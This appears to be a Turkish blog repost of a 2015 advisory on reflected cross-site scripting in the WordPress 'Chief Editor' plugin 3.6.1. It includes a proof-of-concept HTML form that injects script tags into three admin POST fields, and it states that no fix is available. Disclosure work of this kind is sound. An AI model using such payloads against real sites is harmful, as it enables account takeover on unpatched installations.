-
4 Ağustos 2015 Salı


Full BaslikWordPress Chief Editor 3.6.1 Cross Site Scripting Vulnerability
Eklenme Tarihi04-08-2015
Kategoriweb applications
Platformphp
Risk
Security Risk Low

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
Title: WordPress 'Chief Editor' Plugin
Version: 3.6.1
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
Date: 2015-06-17
Download:
Notified Vendor/WordPress: 2015-06-21
==========================================================
 
## Plugin description
==========================================================
Helps wordpress multisite "chief editor" to manage all drafts, comments, authors and "ready for publication" sends across the netw
 
## Vulnerabilities
==========================================================
Some POST parameters are printed directly to the HTML without being sanitized.
 
PoC:
Log in as admin and submit the following form:
 
<form method="POST" action="[URL]/wp422/wp-admin/admin.php?page=chief-editor-dashboard">
<input type="text" name="submitDate" value="someValue"><br />
<input type="text" name="datepicker" value=""/><script>alert(1)</script>"><br />
<input type="text" name="blog_id" value=""/><script>alert(2)</script>"><br />
<input type="text" name="post_id" value=""/><script>alert(3)</script>"><br />
<input type="submit">
</form>
 
 
## Solution
==========================================================
No fix available
 
==========================================================
Vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.
 
# 0day.today [2015-08-04]
# fb.com/inj3ct0rs and twitter.com/inj3ct0r
ETİKETLER :
Different Themes
REKLAM ALANI !
SİTEMİZE REKLAM VERMEK İSTİYORSANIZ YÖNETİCİ İLETİŞİM FORUMUNU KULLANABİLİRSİNİZ

0 yorum

Yorum Kuralları:
1) Küfür Yasaktır
2) Teklif Hakları Kullanıcıya Aittir